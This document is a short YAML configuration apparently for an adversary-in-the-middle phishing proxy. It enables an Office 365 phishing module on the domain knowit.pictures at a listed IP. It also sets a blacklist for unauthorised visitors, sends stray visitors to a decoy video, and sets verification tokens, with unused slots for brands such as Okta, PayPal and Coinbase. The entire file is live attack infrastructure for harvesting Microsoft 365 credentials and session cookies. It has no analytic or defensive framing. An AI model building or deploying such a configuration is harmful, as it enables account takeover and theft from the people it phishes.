blacklist_mode: unauth
ip: 66.228.62.183
redirect_key: gm
redirect_url: https://www.youtube.com/watch?v=dQw4w9WgXcQ
server: knowit.pictures
site_domains:
  airbnb: ""
  amazon: ""
  booking: ""
  citrix: ""
  coinbase: ""
  facebook: ""
  github: ""
  instagram: ""
  linkedin: ""
  o365: knowit.pictures
  okta: ""
  onelogin: ""
  outlook: ""
  paypal: ""
  protonmail: ""
  reddit: ""
  tiktok: ""
  twitter: ""
  twitter-mobile: ""
  wordpress:
    org: ""
sites_enabled:
- o365
verification_key: ew
verification_token: 298c